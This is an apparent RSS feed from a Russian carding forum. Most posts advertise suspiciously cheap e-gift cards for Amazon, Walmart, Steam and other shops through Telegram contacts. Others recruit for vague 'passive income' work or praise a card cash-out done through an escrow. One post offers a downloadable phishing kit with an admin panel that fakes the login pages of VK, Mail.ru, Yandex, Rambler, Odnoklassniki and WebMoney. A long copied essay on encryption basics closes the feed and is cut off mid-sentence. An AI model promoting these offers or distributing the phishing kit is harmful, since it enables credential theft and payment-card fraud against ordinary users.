https://carton.forum.cool/ Кардинг ru-ru Sun, 03 Mar 2019 16:37:55 +0300 MyBB/mybb.ru https://carton.forum.cool/viewtopic.php?pid=51#p51 <p><strong><span style="display: block; text-align: center">Гифты - это подарочные сертификаты с фиксированным балансом от различных магазинов. Они существуют двух видов, физические и электронные. Физические приобретаются в розничных магазинах и там же отовариваются, электронные можно приобрести непосредственно в интернет-магазине и с помощью них совершать покупки. Я занимаюсь исключительно продажей e-гифтов (электронных сертификатов)! После приобретения подарочного сертификата у меня, вы можете купить себе любой товар в каком-нибудь интернет-магазине, стоимость покупки не может превышать фиксированный баланс.</p> <p>Могу сделать гифты практически любого магазина, который может принимать в качестве оплаты - оплату e-гифтами!</p> <p>Цены значительно ниже, чем у других поставщиков! Также заинтересован в длительном сотрудничестве с постоянными скупщиками! Продажа только в одни руки, замену делаю в течении двух дней (как правило несколько минут). </p> <p>В наличии имеются различные номиналы - перед покупкой уточняйте!<br /><br /><br /></p> <p>Cайт - <a href="http://qps.ru/vCj1H" rel="nofollow" target="_blank">http://giftshops.cc</a> </p> <p>Магазин 24/7 в Telegram: SShopsuu_bot</p> <p>Консультация Telegram: Shopsuu</span></strong></p> mybb@mybb.ru (g.shops) Sun, 03 Mar 2019 16:37:55 +0300 https://carton.forum.cool/viewtopic.php?pid=51#p51 https://carton.forum.cool/viewtopic.php?pid=50#p50 <p><strong><span style="display: block; text-align: center">Asos,спормастер,Ozon,Adidas,Eldorado,Ebay,Amazon,Walmart,Target,Steam<br /></p> <p>Гифты - это подарочные сертификаты с фиксированным балансом от различных магазинов. Они существуют двух видов, физические и электронные. Физические приобретаются в розничных магазинах и там же отовариваются, электронные можно приобрести непосредственно в интернет-магазине и с помощью них совершать покупки. Я занимаюсь исключительно продажей e-гифтов (электронных сертификатов)! После приобретения подарочного сертификата у меня, вы можете купить себе любой товар в каком-нибудь интернет-магазине, стоимость покупки не может превышать фиксированный баланс.</p> <p>Могу сделать гифты практически любого магазина, который может принимать в качестве оплаты - оплату e-гифтами!</p> <p>Цены значительно ниже, чем у других поставщиков! Также заинтересован в длительном сотрудничестве с постоянными скупщиками! Продажа только в одни руки, замену делаю в течении двух дней (как правило несколько минут). </p> <p>В наличии имеются различные номиналы - перед покупкой уточняйте!<br /><br /><br /></p> <p>Cайт - <a href="http://qps.ru/sdgZC" rel="nofollow" target="_blank">http://giftshop.shopsn.su</a></p> <p>Магазин 24/7 в Telegram:@SShopsuu_bot</p> <p>Консультация Telegram:@Shopsuu<br /></span></strong></p> mybb@mybb.ru (shopsuu) Wed, 05 Dec 2018 00:57:17 +0300 https://carton.forum.cool/viewtopic.php?pid=50#p50 https://carton.forum.cool/viewtopic.php?pid=49#p49 <p><strong><span style="font-style: italic">Гифты - это подарочные сертификаты с фиксированным балансом от различных магазинов. Они существуют двух видов, физические и электронные. Физические приобретаются в розничных магазинах и там же отовариваются, электронные можно приобрести непосредственно в интернет-магазине и с помощью них совершать покупки. Я занимаюсь исключительно продажей e-гифтов (электронных сертификатов)! После приобретения подарочного сертификата у меня, вы можете купить себе любой товар в каком-нибудь интернет-магазине, стоимость покупки не может превышать фиксированный баланс.</p> <p>Могу сделать гифты практически любого магазина, который может принимать в качестве оплаты - оплату e-гифтами!</p> <p>Цены значительно ниже, чем у других поставщиков! Также заинтересован в длительном сотрудничестве с постоянными скупщиками! Продажа только в одни руки, замену делаю в течении двух дней (как правило несколько минут).</p> <p>В наличии имеются различные номиналы - перед покупкой уточняйте!<br /><br /></p> <p>Cайт - <a href="http://qps.ru/7zKoL" rel="nofollow" target="_blank">http://giftshop.shopsn.su</a></p> <p>Telegram:@ Shopsuu</span></strong></p> mybb@mybb.ru (dxcard) Mon, 26 Nov 2018 18:01:01 +0300 https://carton.forum.cool/viewtopic.php?pid=49#p49 https://carton.forum.cool/viewtopic.php?pid=48#p48 <p><span style="display: block; text-align: center"><strong>Что такое гифт (подарочная карта)?</p> <p>Гифты - это подарочные сертификаты с фиксированным балансом от различных магазинов. Они существуют двух видов, физические и электронные. Физические приобретаются в розничных магазинах и там же отовариваются, электронные можно приобрести непосредственно в интернет-магазине и с помощью них совершать покупки. Я занимаюсь исключительно продажей e-гифтов (электронных сертификатов)! После приобретения подарочного сертификата у меня, вы можете купить себе любой товар в каком-нибудь интернет-магазине, стоимость покупки не может превышать фиксированный баланс.</p> <p>Могу сделать гифты практически любого магазина, который может принимать в качестве оплаты - оплату e-гифтами!</p> <p>Цены значительно ниже, чем у других поставщиков! Также заинтересован в длительном сотрудничестве с постоянными скупщиками! Продажа только в одни руки, замену делаю в течении двух дней (как правило несколько минут).</p> <p>В наличии имеются различные номиналы - перед покупкой уточняйте!<br /><br /></p> <p>Могу сделать гифты практически любого магазина, который может принимать в качестве оплаты - оплату e-гифтами!</p> <p>Цены значительно ниже, чем у других поставщиков! Также заинтересован в длительном сотрудничестве с постоянными скупщиками! Продажа только в одни руки, замену делаю в течении двух дней (как правило несколько минут).</p> <p>В наличии имеются различные номиналы - перед покупкой уточняйте!<br /><br /><br /></p> <p>Cайт -<a href="http://qps.ru/nrmaK" rel="nofollow" target="_blank">https://giftshop.twopay.ru</a></p> <p>Телеграмм - Sh0psu</strong></span></p> mybb@mybb.ru (storgift) Wed, 10 Oct 2018 14:27:41 +0300 https://carton.forum.cool/viewtopic.php?pid=48#p48 https://carton.forum.cool/viewtopic.php?pid=47#p47 <p>Что такое гифт (подарочная карта)?</p> <p>Гифты - это подарочные сертификаты с фиксированным балансом от различных магазинов. Они существуют двух видов, физические и электронные. Физические приобретаются в розничных магазинах и там же отовариваются, электронные можно приобрести непосредственно в интернет-магазине и с помощью них совершать покупки. Я занимаюсь исключительно продажей e-гифтов (электронных сертификатов)! После приобретения подарочного сертификата у меня, вы можете купить себе любой товар в каком-нибудь интернет-магазине, стоимость покупки не может превышать фиксированный баланс.</p> <p>Могу сделать гифты практически любого магазина, который может принимать в качестве оплаты - оплату e-гифтами!</p> <p>Цены значительно ниже, чем у других поставщиков! Также заинтересован в длительном сотрудничестве с постоянными скупщиками! Продажа только в одни руки, замену делаю в течении двух дней (как правило несколько минут).</p> <p>В наличии имеются различные номиналы - перед покупкой уточняйте!</p> <p>Cайт - <a href="http://qps.ru/LM9kl" rel="nofollow" target="_blank">https://giftshop.twopay.ru</a></p> <p>Телеграмм - Sh0psu</p> mybb@mybb.ru (cyrildu) Thu, 27 Sep 2018 00:24:32 +0300 https://carton.forum.cool/viewtopic.php?pid=47#p47 https://carton.forum.cool/viewtopic.php?pid=46#p46 <p>Привет какой минимальный лимит и можно ли провести сделку через гарант с которым я уже работал и ему доверяю</p> mybb@mybb.ru (vbif18) Tue, 30 Jan 2018 14:03:53 +0300 https://carton.forum.cool/viewtopic.php?pid=46#p46 https://carton.forum.cool/viewtopic.php?pid=45#p45 <p>Доброго времени суток!<br />Требуются люди для сотрудничества.</p> <p>Требования:</p> <p>Возраст: 18+<br />Геолокация: важно (только RU: не все города, указывайте в сообщении свой город)<br />Образование: не важно<br />Опыт работы: не имеет значения<br />Специальные навыки: не играют роли<br />Адекватность: важно<br />Порядочность: непременное условие<br />Пунктуальность: требуется<br />Вложения: нет<br />Если вы хотите получить источник постоянного пассивного дохода и поднять свой социальный статус,<br />если вы готовы к долговременному честному сотрудничеству и открывающимся перспективам,<br />то свяжитесь с нами.</p> <p>Внимание!</p> <p>Не связано с:<br />наркотиками,<br />криптовалютой,<br />компьютерными играми,<br />азартными играми,<br />оружием,<br />ставками на спорт,<br />МЛМ,<br />финансовыми пирамидами,<br />спамом,<br />флудом,<br />вредоносными программами,<br />рекламой,<br />арбитражем траффика,<br />мошенничеством<br />Ваш доход: первый месяц 20000, далее от 40000 до 180000 и выше</p> <p>Все вопросы по контактам:<br />Telegram: Mediator1<br />r0man0@yahoo.com</p> mybb@mybb.ru (r0man0) Sun, 28 Jan 2018 16:51:08 +0300 https://carton.forum.cool/viewtopic.php?pid=45#p45 https://carton.forum.cool/viewtopic.php?pid=44#p44 <p>Ве на высшем уровне. Спасибо. Деньги пришли через 10 минут после перевода в гарант! Есть еще одна карта , го еще залив если можно<br /><a href="http://uploads.ru/znk3F.jpg" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="https://s4.uploads.ru/t/znk3F.jpg" alt="http://s4.uploads.ru/t/znk3F.jpg" /></a></p> mybb@mybb.ru (Alex25) Sat, 11 Feb 2017 17:31:40 +0300 https://carton.forum.cool/viewtopic.php?pid=44#p44 https://carton.forum.cool/viewtopic.php?pid=42#p42 <p>Хах, протестим. Поставил в общаге на комп :D</p> mybb@mybb.ru (Ванька) Sat, 11 Feb 2017 17:24:35 +0300 https://carton.forum.cool/viewtopic.php?pid=42#p42 https://carton.forum.cool/viewtopic.php?pid=41#p41 <p>Блин!!! Нафига под хайд засунул ссылки? напиши в лс</p> mybb@mybb.ru (Ванька) Sat, 11 Feb 2017 17:23:29 +0300 https://carton.forum.cool/viewtopic.php?pid=41#p41 https://carton.forum.cool/viewtopic.php?pid=38#p38 <p>Набор фейков от [ixTor]. (+админка). В архиве содержится:<br />Вконтакте<br />Маил.ру<br />Яндекс.Почта<br />Рамблер<br />Одноклассники<br />ВебМани<br />_http://narod.ru/disk/11792490000/fakes%20(copy%203).rar.html</p> mybb@mybb.ru (GrantGarant) Sat, 11 Feb 2017 17:15:52 +0300 https://carton.forum.cool/viewtopic.php?pid=38#p38 https://carton.forum.cool/viewtopic.php?pid=35#p35 <p>Взято с вики, ты бы писал где берешь статью, если сам ее не пишешь. А так полезная информация</p> mybb@mybb.ru (DoradO_o) Sat, 11 Feb 2017 17:11:19 +0300 https://carton.forum.cool/viewtopic.php?pid=35#p35 https://carton.forum.cool/viewtopic.php?pid=30#p30 <p>Безопасность цепи зависит от самого слабого звена: чем оно над жнее, тем цепь прочнее. В хорошей криптосистеме должны быть досконально проверены и алгоритм, и протокол, и ключи, и вс остальное. Если криптографический алгоритм достаточно стоек, а генератор случайных чисел, используемый для создания ключей, никуда не годится, любой достаточно опытный криптоаналитик в первую очередь обратит сво внимание именно на него. Если удастся улучшить генератор, но не будут зачищаться ячейки памяти компьютера, после того как в них побывал сгенерированный ключ, грош цена такой безопасности. Если используются стойкий криптографический алгоритм и действительно случайные ключи, которые аккуратно стираются из памяти компьютера после того, как они были использованы, но перед шифрованием файл, в котором вместе с вашим адресом и фамилией указаны все ваши доходы за текущий год, был по ошибке отправлен электронной почтой в налоговую службу, то зачем, спрашивается, вам понадобились и стойкий алгоритм, и случайные ключи, и зачистка компьютерной памяти в придачу?!</p> <p>Криптографу не позавидуешь: в проектируемой им криптосистеме он должен предусмотреть защиту абсолютно от всех видов атак, какие только сможет придумать воспал нное воображение криптоаналитика. Криптоаналитику же наоборот, достаточно отыскать единственное слабое звено в цепи криптографической защиты и организовать атаку только против этого звена.</p> <p>Кроме этого следует учитывать, что на практике угроза информационной безопасности любого объекта исходит не только от криптоаналитика. В конце концов, каким бы длинным не был криптографический ключ, который используется вами для шифрования файлов, если правоохранительным органам понадобится узнать, что хранится в вашем компьютере, они просто установят камеру и скрупул зно запишут всю информацию, появляющуюся на экране. Недаром, по признанию официальных лиц из АНБ, большинство сбоев в обеспечении информационной безопасности происходит не из-за найденных слабостей в криптографических алгоритмах и протоколах, а из-за вопиющих оплошностей в их реализации. Какой бы стойкостью не обладал криптографический алгоритм, при успешной атаке против него эту стойкость не приходится преодолевать в лоб, е просто уда тся обойти каким-либо окольным пут м. Однако и пренебрегать хорошими криптографическими алгоритмами тоже не следует, чтобы криптография не стала самым слабым звеном в цепи, которое не выдержит напора атакующего.</p> <p>Как выбрать хороший криптографический алгоритм</p> <p>Когда заходит речь о выборе хорошего криптографического алгоритма, у выбирающего, как правило, имеется несколько возможностей:</p> <p>- Можно воспользоваться известным алгоритмом, сравнительно давно опубликованным в специальном издании по проблемам криптографии. Если никто пока не сообщил о том, что сумел вскрыть этот алгоритм, значит, он стоит того, чтобы обратить на него внимание.</p> <p>- Можно довериться известной фирме, специализирующейся на продаже средств шифрования. Вряд ли эта фирма будет рисковать своим добрым именем, торгуя нестойкими криптографическими алгоритмами.</p> <p>- Можно обратится к независимому эксперту. Скорее всего, он сможет объективно оценить достоинства и недостатки различных криптографических алгоритмов.</p> <p>- Можно обратится за поддержкой в соответствующее правительственное ведомство. Вряд ли правительство будет вводить своих граждан в заблуждение, давая им ложные советы относительно стойкости того или иного криптографического алгоритма.</p> <p>- Можно попытаться создать собственный криптографический алгоритм. Мало кто заинтересован сам себя обманывать. Чем ч рт не шутит: а вдруг вы обладаете выдающимися способностями в области криптографии?</p> <p>Во всех перечисленных возможностях имеются свои существенные изъяны. Полагаться только на одну фирму, на одного эксперта или на одно ведомство не совсем разумно. Многие люди, называющие себя независимыми экспертами, мало понимают в криптографии. Большинство фирм, производящих средства шифрования, ничуть не лучше. В АНБ и ФАПСИ работают лучшие криптографы в мире, однако, по понятным соображениям, они не спешат поделиться своими секретами с первым встречным. Впрочем, и со вторым тоже. И даже если вы гений в криптографии, глупо использовать криптографический алгоритм собственного изобретения без того, чтобы его всесторонне проанализировали и протестировали опытные криптологи.</p> <p>Поэтому наиболее предпочтительной представляется первая из перечисленных возможностей. Данный подход к оценке стойкости криптографических алгоритмов можно было бы признать идеальным, если бы не один его недостаток. К сожалению, ничего неизвестно о результатах криптоаналитических исследований этих алгоритмов, которые, несомненно, активно велись в прошлом и продолжают также активно проводится во всем мире многочисленными сотрудниками различных правительственных ведомств, в компетенцию которых входят криптологические изыскания. Эти ведомства, скорее всего, гораздо лучше финансируются, чем академические институты, ведущие аналогичные исследования. Да и начали они заниматься криптологией значительно раньше, чем уч ные, не имеющие воинских званий, и специалисты из частных фирм. Поэтому можно предположить, что военные нашли гораздо более простые способы вскрытия известных шифров, нежели те, которые изобретены за пределами строго охраняемых зданий сверхсекретных правительственных ведомств.</p> <p>Ну и пусть. Даже если вас арестуют и в качестве улики конфискуют у вас ж сткий диск с файлами, зашифрованными по DES-алгоритму, то вряд ли криптоаналитики, состоящие на государственной службе, придут на судебное заседание, чтобы клятвенно подтвердить, что данные для вашего обвинительного заключения получены пут м дешифрования конфискованных файлов. Тот факт, что можно вскрывать какой-то конкретный криптографический алгоритм, часто является значительно большим секретом, чем информация, полученная пут м вскрытия этого алгоритма.</p> <p>Лучше всего исходить из предположения, заключающегося в том, что АНБ, ФАПСИ и иже с ними могут прочесть любое сообщение, которое они пожелают прочесть. Однако эти ведомства не в состоянии читать все сообщения, с содержанием которых хотят ознакомиться. Главной причиной является ограниченность в средствах, выделяемых правительством на криптоанализ. Другое разумное предположение состоит в том, что компетентным органам гораздо легче получить доступ к зашифрованной информации с помощью грубой физической силы, чем пут м изящных, но очень трудо мких математических выкладок, приводящих к вскрытию шифра.</p> <p>В любом случае гораздо над жнее пользоваться известным криптографическим алгоритмом, который придуман уже довольно давно и который сумел выстоять против многочисленных попыток вскрыть его, предпринятых авторитетными криптологами.</p> <p>Криптографические алгоритмы, предназначенные для экспорта</p> <p>В настоящее время у пользователей персональных компьютеров имеется возможность применять шифровальные алгоритмы, встроенные в различные программные продукты. Достаточно приобрести, например, текстовый редактор Word, или операционные системы Windows NT и Netware, или редактор электронных таблиц Excel. У всех этих программных продуктов есть ещ одно общее свойство, кроме наличия в них встроенных алгоритмов шифрования. Они изготовлены в Соедин нных Штатах, и прежде чем начать торговать ими за рубежом, американские производители в обязательном порядке должны получить разрешение у своего правительства на их экспорт за пределы США.</p> <p>Повсеместно распространено мнение, что ни один криптографический алгоритм, который разреш н к экспорту из США, не является достаточно стойким, чтобы его не могли вскрыть криптоаналитики из АНБ. Считается, что компании, которые желают продавать за рубежом свою продукцию, позволяющую осуществлять шифрование данных, по настоянию АНБ переделывают используемые криптографические алгоритмы так, что</p> <p>- время от времени отдельные биты ключа подмешиваются в шифртекст;</p> <p>- ключ имеет длину всего 30 бит вместо официально заявляемых 100 бит, поскольку большинство ключей оказываются эквивалентны;</p> <p>- в начало каждого шифруемого сообщения вставляется фиксированный заголовок, чтобы облегчить криптоаналитическую атаку со знанием открытого текста;</p> <p>- любое шифрованное сообщение содержит отрезок случайного открытого текста вместе с соответствующим ему шифртекстом.</p> <p>Исходные тексты шифровальных программ передаются на хранение в АНБ, однако за пределами этого сверхсекретного агентства доступ к ним закрыт наглухо. Вполне естественно, что ни АНБ, ни американские компании, получившие от АНБ разрешение на экспорт своих шифровальных средств, не заинтересованы в рекламе слабостей криптографических алгоритмов, положенных в основу функционирования этих средств. Поэтому желательно проявлять очень большую осторожность, если вы собираетесь защищать свои данные при помощи американских программ шифрования, которые одобрены правительством США для экспорта за пределы страны.<br />Симметричный или асимметричный криптографический алгоритм?</p> <p>Какой алгоритм лучше - симметричный или асимметричный? Вопрос не совсем корректен, поскольку предусматривает использование одинаковых критериев при сравнении криптосистем с секретным и открытым ключом. А таких критериев не существует.</p> <p>Тем не менее, дебаты относительно достоинств и недостатков двух основных разновидностей криптосистем ведутся начиная с момента изобретения первого алгоритма с открытым ключом. Отмечено, что симметричные криптографические алгоритмы имеют меньшую длину ключа и работают быстрее, чем асимметричные.</p> <p>Однако, по мнению одного из изобретателей криптосистем с открытым ключом - американского криптолога У. Диффи, их следует рассматривать не как некую совершенно новую разновидность универсальных криптосистем. Криптография с открытым ключом и криптография с секретным ключом - это &quot;две большие разницы&quot;, они предназначены для решения абсолютно разных проблем, связанных с засекречиванием информации. Симметричные криптографические алгоритмы служат для шифрования данных, они работают на несколько порядков быстрее, чем асимметричные алгоритмы. Однако и у криптографии с открытым ключом есть области применения, в которых криптографии с секретным ключом делать нечего. К ним относятся работа с ключами и многочисленные криптографические протоколы.</p> <p>Шифрование в каналах связи компьютерной сети</p> <p>Одной из отличительных характеристик любой компьютерной сети является е деление на так называемые уровни, каждый из которых отвечает за соблюдение определ нных условий и выполнение функций, которые необходимы для общения между собой компьютеров, связанных в сеть. Это деление на уровни имеет фундаментальное значение для создания стандартных компьютерных сетей. Поэтому в 1984 году несколько международных организаций и комитетов объединили свои усилия и выработали примерную модель компьютерной сети, известную под названием OSI (Open Systems Interconnection).</p> <p>OSI разносит коммуникационные функции по уровням. Каждый из этих уровней функционирует независимо от ниже- и вышележащих. Он может непосредственно общаться только с двумя соседними уровнями, но полностью изолирован от прямого обращения к следующим уровням. Модель OSI выделяет семь уровней: верхние три служат для связи с конечным пользователем, а нижние четыре ориентированы на выполнение коммуникационных функций в реальном масштабе времени.</p> <p>В теории шифрование данных для передачи по каналам связи компьютерной сети может осуществляться на любом уровне модели OSI. На практике это обычно делается либо на самых нижних, либо на самых верхних уровнях. Если данные шифруются на нижних уровнях, шифрование называется канальным. Если шифрование данных выполняется на верхних уровнях, то оно зов тся сквозным. Оба этих подхода к шифрованию данных имеют свои преимущества и недостатки.</p> <p>Канальное шифрование</p> <p>При канальном шифровании шифруются абсолютно все данные, проходящие через каждый канал связи, включая открытый текст сообщения, а также информацию о его маршрутизации и об используемом коммуникационном протоколе (см. рис. 1). Однако в этом случае любой интеллектуальный сетевой узел (например, коммутатор) будет вынужден расшифровывать входящий поток данных, чтобы соответствующим образом его обработать, и снова зашифровывать, чтобы передать на другой узел сети.</p> <p>Тем не менее, канальное шифрование представляет собой очень эффективное средство защиты информации в компьютерных сетях. Поскольку шифрованию подлежат все данные, движущиеся от одного узла сети к другому, у криптоаналитика нет никакой дополнительной информации о том, кто служит источником передаваемых данных, кому они предназначены, какова их структура и так далее. А если ещ позаботиться и о том, чтобы, пока канал простаивает, передавать по нему случайную битовую последовательность, сторонний наблюдатель не сможет даже сказать, где начинается и где заканчивается текст передаваемого сообщения.</p> <p>Не слишком сложной является и работа с ключами. Одинаковыми ключами следует снабдить только два соседних узла сети связи, которые затем могут менять используемые ключи независимо от других пар узлов.</p> <p>Узел 1 Узел 2 Узел 3 Узел 4</p> <p>Канал 1 Канал 2 Канал 3</p> <p>P P</p> <p>Рис. 1. Канальное шифрование</p> <p>Самый большой недостаток канального шифрования связан с тем, что данные приходится шифровать при передаче по каждому физическому каналу компьютерной сети. Отправка информации в незашифрованном виде по какому-то из каналов ставит под угрозу обеспечение безопасности всей сети в целом. В результате стоимость реализации канального шифрования в больших сетях может оказаться чрезмерно велика.</p> <p>Кроме того, при использовании канального шифрования дополнительно потребуется защищать каждый узел компьютерной сети, через который проходят передаваемые по сети данные. Если абоненты сети полностью доверяют друг другу и каждый е узел размещ н в защищ нном от проникновения злоумышленников месте, на этот недостаток канального шифрования можно не обращать внимание. Однако на практике такое положение встречается чрезвычайно редко. Ведь в каждой фирме есть конфиденциальные данные, знакомиться с которыми могут только сотрудники одного определ нного отдела, а за его пределами доступ к этим данным необходимо ограничивать до минимума.</p> <p>Сквозное шифрование</p> <p>При сквозном шифровании криптографический алгоритм реализуется на одном из верхних уровней модели OSI. Шифрованию подлежит только содержательная часть сообщения, которое требуется передать по сети. После зашифрования к ней добавляется служебная информация, необходимая для маршрутизации сообщения, и результат переправляется на более низкие уровни с целью отправки адресату.</p> <p>Теперь сообщение не требуется постоянно расшифровывать и зашифровывать при прохождении через каждый промежуточный узел сети связи. Сообщение оста тся зашифрованным на вс м пути от отправителя к получателю (см. рис. 2).</p> <p>Основная проблема, с которой сталкиваются пользователи компьютерных сетей, где применяется сквозное шифрование, связана с тем, что служебная информация, используемая для маршрутизации сообщений, переда тся по сети в незашифрованном виде. Опытный криптоаналитик может извлечь для себя массу полезной информации, зная кто, с кем, как долго и в какие часы общается через компьютерную сеть. Для этого ему даже не потребуется быть в курсе предмета общения.</p> <p>По сравнению с канальным сквозное шифрование характеризуется более сложной работой с ключами, поскольку каждая пара пользователей компьютерной сети должна быть снабжена одинаковыми ключами, прежде чем они смогут связаться друг с другом. Вдобавок, поскольку криптографический алгоритм реализуется на верхних уровнях модели OSI, приходится также сталкиваться со многими существенными различиями в коммуникационных протоколах и интерфейсах в зависимости от типов компьютерных сетей и объединяемых в сеть компьютеров. Вс это затрудняет практическое применение сквозного шифрования.</p> <p>Узел 1 Узел 2 Узел 3 Узел 4</p> <p>Канал 1 Канал2 Канал 3</p> <p>P P</p> <p>Рис. 2. Сквозное шифрование</p> <p>Комбинированное шифрование</p> <p>Комбинация канального и сквозного шифрования данных в компьютерной сети обходится значительно дороже, чем канальное или сквозное шифрование по отдельности. Однако именно такой подход позволяет наилучшим образом защитить данные, передаваемые по сети. Шифрование в каждом канале связи не позволяет противнику анализировать служебную информацию, используемую для маршрутизации. А сквозное шифрование уменьшает вероятность доступа к незашифрованным данным в узлах сети.</p> <p>При комбинированном шифровании работа с ключами вед тся раздельно: сетевые администраторы отвечают за ключи, используемые при канальном шифровании, а о ключах, применяемых при сквозном шифровании, заботятся сами пользователи.</p> <p>Шифрование файлов</p> <p>На первый взгляд шифрование файлов можно полностью уподобить шифрованию сообщений, отправителем и получателем которых является одно лицо, а средой передачи служит одно из компьютерных устройств хранения данных (магнитный или оптический диск, магнитная лента, оперативная память). Однако вс не так просто, как кажется на первый взгляд.</p> <p>При передаче по коммуникационным каналам сообщение не имеет большой ценности. Если оно затеряется по пути от отправителя к получателю, его можно попытаться передать снова. При шифровании данных, предназначенных для хранения в виде компьютерных файлов, дела обстоят совершенно иначе. Если вы не в состоянии расшифровать свой файл, вам вряд ли удастся сделать это и со второй, и с третьей, и даже с сотой попытки. Ваши данные будут потеряны раз и навсегда. Это означает, что при шифровании файлов необходимо предусмотреть специальные механизмы для предотвращения возникновения ошибок в шифртексте.</p> <p>Криптография помогает превратить большие секреты в маленькие. Вместо того чтобы безуспешно пытаться запомнить содержимое огромного файла, человеку достаточно его зашифровать и сохранить в памяти использованный для этой цели ключ. Если ключ применяется для шифрования сообщения, то его требуется иметь под рукой лишь до тех пор, пока сообщение не дойд т до своего адресата и не будет им успешно расшифровано. В отличие от сообщений, шифрованные файлы могут хранится годами, и в течение всего этого времени необходимо помнить и держать в секрете соответствующий ключ.</p> <p>Есть и другие особенности шифрования файлов, о которых необходимо помнить вне зависимости от криптографического алгоритма, применяемого для этой цели:</p> <p>- нередко после шифрования файла его незашифрованная копия благополучно забыва тся на другом магнитном диске, на другом компьютере или в виде распечатки, сделанной на принтере;</p> <p>- размер блока в блочном алгоритме шифрования может значительно превышать размер отдельной порции данных в структурированном файле, в результате чего итоговая длина зашифрованного файла окажется намного больше, чем длина исходного файла;</p> <p>- скорость шифрования файлов при помощи выбранного для этой цели криптографического алгоритма должна соответствовать скоростям, на которых работают устройства ввода/вывода современных компьютеров;</p> <p>- работа с ключами является довольно непростым делом, поскольку разные пользователи обычно должны иметь доступ не только к различным файлам, но и к отдельным частям одного и того же файла.</p> <p>Если файл представляет собой единое целое (например, содержит отрезок текста), восстановление этого файла в исходном виде не потребует больших усилий: перед использованием достаточно будет просто расшифровать весь файл. Однако если файл структурирован (например, раздел н на записи и поля, как это делается в базах данных), то расшифровывание всего файла целиком всякий раз, когда необходимо осуществить доступ к отдельной порции данных, сделает работу с таким файлом чрезвычайно неэффективной. А при индивидуальном шифровании порций данных в структурированном файле сделает его уязвимым по отношению к атаке, при которой злоумышленник отыскивает в этом файле нужную порцию данных и заменяет е на другую по своему усмотрению.</p> <p>У пользователя, который хочет зашифровать каждый файл, размещ нный на ж стком диске компьютера, имеются две возможности. Если он использует один ключ для шифрования всех файлов, то впоследствии окажется не в состоянии разграничить доступ к отдельным файлам со стороны других пользователей. Кроме того, в результате у криптоаналитика будет значительное количество шифртекста, полученного на одном ключе, что существенно облегчит ему вскрытие этого ключа.</p> <p>Лучше шифровать каждый файл на отдельном ключе, а затем зашифровать все ключи при помощи мастер-ключа. Тем самым пользователи будут избавлены от суеты, связанной с организацией над жного хранения большого числа ключей. Разграничение доступа групп пользователей к различным файлам будет осуществляться пут м деления множества всех ключей на подмножества и шифрования этих подмножеств на различных мастер-ключах. Стойкость такой криптосистемы будет значительно выше, чем в случае использования единого ключа для шифрования всех файлов на ж стком диске, поскольку ключи, применяемые для шифрования файлов, можно сделать более случайными и, следовательно, более стойкими против словарной атаки.</p> <p>[i]Аппаратное и программное шифрование</p> <p>Аппаратное шифрование</p> <p>Большинство средств криптографической защиты данных реализовано в виде специализированных аппаратных устройств. Эти устройства встраиваются в линию связи и осуществляют шифрование всей передаваемой по ней информации. Преобладание аппаратного шифрования над программным обусловлено несколькими причинами.</p> <p>Во-первых, аппаратное шифрование обладает большей скоростью. Криптографические алгоритмы состоят из огромного числа сложных операций, выполняемых над битами открытого текста. Современные универсальные компьютеры плохо приспособлены для эффективного выполнения этих операций. Специализированное оборудование умеет делать их гораздо быстрее.</p> <p>Во-вторых, аппаратуру легче физически защитить от проникновения извне. Программа, выполняемая на персональном компьютере, практически беззащитна. Вооружившись отладчиком, злоумышленник может скрытно внести в не изменения, чтобы понизить стойкость используемого криптографического алгоритма, и никто ничего не заметит. Что же касается аппаратуры, то она обычно помещается в особые контейнеры, которые делают невозможным изменение схемы е функционирования. Чип покрывается сверху специальным химическим составом, и в результате любая попытка преодолеть защитный слой этого чипа приводит к самоуничтожению его внутренней логической структуры. И хотя иногда электромагнитное излучение может служить хорошим источником информации о том, что происходит внутри микросхемы, от этого излучения легко избавиться, заэкранировав микросхему. Аналогичным образом можно заэкранировать и компьютер, однако сделать это гораздо сложнее, чем в случае миниатюрной микросхемы.</p> <p>И в-третьих, аппаратура шифрования более проста в установке. Очень часто шифрование требуется там, где дополнительное компьютерное оборудование является совершенно излишним. Телефоны, факсимильные аппараты и модемы значительно дешевле оборудовать устройствами аппаратного шифрования, чем встраивать в них микрокомпьютеры с соответствующим программным обеспечением.</p> <p>Даже в компьютерах установка специализированного шифровального оборудования созда т меньше проблем, чем модернизация системного программного обеспечения с целью добавления в него функций шифрования данных. В идеале шифрование должно осуществляться незаметно для пользователя. Чтобы добиться этого при помощи программных средств, шифрование должно быть упрятано глубоко в недра операционной системы. С готовой и отлаженной операционной системой безболезненно проделать это не так-то просто. Но даже любой непрофессионал сможет подсоединить шифровальный блок с одной стороны к персональному компьютеру и к внешнему модему с другой.</p> <p>Современный рынок аппаратных средств шифрования информации предлагает потенциальным покупателям три разновидности таких средств - самодостаточные шифровальные модули (они самостоятельно выполняют всю работу с ключами), блоки шифрования в каналах связи и шифровальные платы расширения для установки в персональные компьютеры. Большинство устройств первого и второго типа являются узко специализированными, и поэтому, прежде чем принимать окончательное и бесповоротное решение об их приобретении, необходимо досконально изучить ограничения, которые при установке накладывают эти устройства на соответствующее &quot;железо&quot;, операционные системы и прикладное программное обеспечение. А иначе можно выбросить деньги на ветер, ни на йоту не приблизившись к желанной цели. Правда, иногда выбор облегчается тем, что некоторые компании торгуют коммуникационным оборудованием, которое уже имеет в сво м составе предустановленную аппаратуру шифрования данных.</p> <p>Платы расширения для персональных компьютеров являются более универсальным средством аппаратного шифрования и обычно могут быть легко сконфигурированы таким образом, чтобы шифровать всю информацию, которая записывается на ж сткий диск компьютера, а также все данные, пересылаемые на его гибкий диск и в последовательные порты. Как правило, защита от электромагнитного излучения в шифровальных платах расширения отсутствует, поскольку нет смысла защищать эти платы, если аналогичные меры не предпринимаются в отношении всего компьютера в целом.</p> <p>Программное шифрование</p> <p>Любой криптографический алгоритм может быть реализован в виде соответствующей программы. Преимущества такой реализации очевидны: программные средства шифрования легко копируются, они просты в использовании, их нетрудно модифицировать в соответствии с конкретными потребностями.</p> <p>Во всех распростран нных операционных системах имеются встроенные средства шифрования файлов. Обычно они предназначены для шифрования отдельных файлов, и работа с ключами целиком возлагается на пользователя. Поэтому применение этих средств требует особого внимания: во-первых, ни в коем случае нельзя хранить ключи на диске вместе с зашифрованными с их помощью файлами, а во-вторых, незашифрованные копии файлов необходимо стереть сразу же после шифрования.</p> <p>Конечно, злоумышленник может добраться до компьютера и незаметно внести нежелательные изменения в программу шифрования. Однако основная проблема состоит отнюдь не в 